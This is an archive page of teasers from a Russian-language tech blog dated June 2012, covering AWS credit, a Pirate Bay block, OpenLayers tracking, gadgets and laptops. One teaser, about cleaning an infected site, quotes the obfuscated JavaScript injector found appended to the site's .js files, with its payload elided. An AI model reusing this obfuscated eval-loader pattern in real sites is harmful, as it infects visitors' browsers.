Архив за 03 июня 2012

$25 на счет Amazon Web Services
Уважаемые читатели!

Сегодняшний пост мой будет краток.
Я совершенно случайно обнаружил доселе неизведанный способ поднимать баланс AWS акка на $25.
Несмотря на возможность испортить малину все же поделюсь с читателим
Читать полностью »

Это таки произошло. С недавнего времени оператор T-Mobile вместо привычной уже картинки с пиратским флагом отдает вот такую вот страничку.

The Pirate Bay заблокирован в Нидерландах

На странице блокировки написано, что решение было принято 10 мая районным судом Гааги во время слушания дела Stichting Brein против T-Mobile Netherlands B.V.

Суд рекомендует провайдерам в течение десяти дней после оглашения решения прекратить доступ к доменному имени и айпи-адресам Пиратской бухты.
Читать полностью »

Сейчас на рынке много предложений по продаже мобильных устройств, предназначенных для контроля движущихся объектов или трекеров. В большинстве из них есть функция передачи информации по GPRS на любой заданный веб-адрес через определенный интервал времени. Чаще всего формат передачи данных разный. Поэтому мы не будем рассматривать вопрос загрузки данных с трекера в базу. Предположим данные есть и мы хотим приступить к созданию сервиса мониторинга транспорта. Основу такой системы образуют возможности:
-выбор карты и ее отображение
-отображение точки или картинки и подписи к ней
-отображение полигона и его редактирование
-отображение линии и ее редактирование
-отображение информации связной с полигонами, линиями, точками (всплывающие подсказки)
-немного математики (подсчет пройденного пути, площадь полигона, принадлежность точки полигону)
Все эти функции легко реализовать с помощью OpenLayers, библиотеки на JavaScript.
OpenLayers или делаем сервис мониторинга транспорта
Читать полностью »

iCade — превратите девайсы Apple в игровые джойстики

iCade Mobile — чехол-приставка с Bluetooth, способный превратить iPhone в подобие PSP. Существует вариация и для iPad, называется она iCade Core.
Уже в продаже. Под катом — пара фото, описание и цена, 2 видео.
Читать полностью »

Однажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.

Далее, я зашёл в систему по SSH и от имени root выполнил команду Читать полностью »

Hexy — сборный робот на основе Arduino

Джозеф Шлезингер уже давно хотел создать некий конструктор для любителей роботов. И наконец, по прошествии нескольких лет работы, он реализовал свои идеи на практике, создав Hexy, интересный набор, позволяющий собрать робота себе по вкусу, если так можно выразиться. При этом набор позволяет собрать своего робота без всяких проблем — наличие готовых к работе модулей упрощает задачу.

Читать полностью »

Минут 20 назад пришла смс от Я.Метрики о том, что слег сервер, который располагается в облаке Selectel. Тут же проверил — пинга нет. Зашел в панель управления — сервер выключен и не включается.
Читать полностью »

ASUS решила повременить с хромобуками
Недавно выпущенное Samsung второе поколение ноутбуков с предустановленной Chrome OS — облачной ОС от Google — с диапазоном цен от $450 до $550 явилось неубедительным шагом для остальных вендоров по ряду причин и тайваньская Asustek пока отложила планы по выпуску своих «хромобуков».

Согласно имеющейся статистике, продажи первого поколения ноутбуков с Chrome OS не превысили 200 000 штук, что не идёт ни в какое сравнение с продажами обычных лептопов — в 2011 году только в России было их продано около 4 млн. Причин этому эксперты называют довольно много: помимо немаленькой цены на устройство, которое сравнимо с ценами на ультрабуки, предлагающими более мощную аппаратную начинку и начинающими дешеветь благодаря усилиям Intel, доля невзыскательных потребителей, предпочитающих скорее потреблять контент, чем его производить (а таких подавляющее большинство), предпочитает модный, запущенный Apple, тренд — планшеты.
Читать полностью »

На сайте интернет-магазина Amazon.com появилось (а потом быстро исчезло, но все же сохранилось в кэше поисковой системы) описание неанонсированного еще пока официально лэптопа Dell XPS 14. Новинка, судя по всему, относится к разряду ультрабуков: она характеризуется толщиной 17,78 мм и комплектуется процессорами Intel Core третьего поколения серий i5 и i7.

Ультрабук Dell XPS 14 появился в каталоге Amazon

Читать полностью »

Xbox и PS следующего поколения все же будут оснащены оптическими приводами

В общем-то, в самой новости нет ничего удивительного. Несмотря на то, что сейчас даже многие модели ноутбуков, ультрабуков и нетбуков выходят без оптических приводов, подавляющее большинство устройств все же снабжено ими. Но вот отделы Sony и Microsoft, занимающиеся разработкой игровых консолей следующего поколения, до последнего времени рассматривали возможность создания этих устройств без оптических приводов.

Читать полностью »


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js